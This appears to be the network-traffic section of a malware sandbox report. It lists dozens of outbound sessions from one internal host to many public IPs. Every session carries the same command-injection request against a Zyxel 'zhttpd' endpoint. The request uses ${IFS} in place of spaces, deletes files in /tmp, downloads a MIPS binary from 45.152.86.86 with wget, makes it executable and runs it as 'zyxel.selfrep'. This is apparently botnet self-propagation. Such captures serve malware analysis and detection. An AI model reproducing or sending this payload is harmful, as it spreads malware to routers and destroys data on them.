                                        Mar 31, 2024 09:21:59.390218019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6615192.168.2.2335006195.139.100.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390260935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6616192.168.2.2336818102.49.152.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390311003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6617192.168.2.234480287.137.6.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390343904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6618192.168.2.2333046205.59.95.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390382051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6619192.168.2.2349326199.158.226.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390419006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6620192.168.2.235254659.231.148.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390467882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6621192.168.2.2339422130.94.207.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390511036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6622192.168.2.234701250.103.107.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390557051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6623192.168.2.2334816171.186.220.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390600920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6624192.168.2.2333026115.16.105.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390656948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6625192.168.2.2350830110.249.151.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390693903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6626192.168.2.235669468.155.180.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390750885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6627192.168.2.234510035.219.89.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390796900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6628192.168.2.235385863.237.148.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390836954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6629192.168.2.235473661.175.147.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390871048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6630192.168.2.235514623.96.176.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390907049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6631192.168.2.235062027.242.39.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390950918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6632192.168.2.235199260.26.92.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.390994072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6633192.168.2.23565425.118.155.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391051054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6634192.168.2.2343280202.237.208.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391096115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6635192.168.2.234282664.4.14.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391134024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6636192.168.2.235592619.168.227.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391180992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6637192.168.2.235695871.108.28.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391211033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6638192.168.2.2339082200.120.99.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391247034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6639192.168.2.2344520213.43.46.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391294003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6640192.168.2.2349850176.131.2.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391326904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6641192.168.2.2349518123.117.188.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391364098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6642192.168.2.2348970147.225.157.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391407013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6643192.168.2.234562490.13.14.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391448975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6644192.168.2.234854871.217.32.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391494036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6645192.168.2.2340490147.248.10.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391521931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6646192.168.2.2359166157.40.37.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.391587019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6647192.168.2.235612487.212.74.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.397037983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6648192.168.2.2359652185.11.250.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.397857904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6649192.168.2.233870639.36.122.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.397890091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6650192.168.2.2334066124.121.135.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.397945881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6651192.168.2.2339936122.187.210.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.397984028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6652192.168.2.2338306196.163.89.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398025990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6653192.168.2.235480623.51.1.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398060083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6654192.168.2.2335520208.36.76.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398104906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6655192.168.2.2333988150.196.225.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398148060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6656192.168.2.2357784168.231.39.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398186922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6657192.168.2.2342062137.117.225.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398209095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6658192.168.2.235376674.79.160.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398246050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6659192.168.2.2338890162.218.207.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398294926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6660192.168.2.233854019.127.200.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398314953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6661192.168.2.236093039.238.43.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398349047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6662192.168.2.2350460126.175.158.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398389101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6663192.168.2.2352158216.45.110.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398435116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6664192.168.2.235655418.91.13.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398473024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6665192.168.2.2356692160.149.28.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398507118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6666192.168.2.2358400132.167.23.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.398550034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6667192.168.2.2348114126.218.94.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:00.400614977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6668192.168.2.2343796174.146.155.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:00.400675058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6669192.168.2.2334552132.137.154.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:00.400813103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6670192.168.2.235234859.25.88.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:00.400844097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6671192.168.2.234397688.163.95.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:00.400908947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6672192.168.2.2345864119.3.195.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:01.409904003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6673192.168.2.235809493.171.82.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:01.409948111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6674192.168.2.2360770199.233.85.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:01.410114050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6675192.168.2.233382646.23.187.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:01.410145044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6676192.168.2.233575477.102.247.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413228035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6677192.168.2.236044613.83.2.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413265944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6678192.168.2.2333362181.78.15.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413328886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6679192.168.2.233532267.98.164.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413398027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6680192.168.2.233425852.241.144.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413436890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6681192.168.2.2341722177.171.150.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:02.413497925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6682192.168.2.2332818188.179.171.195443
                                        TimestampBytes transferredDirectionData
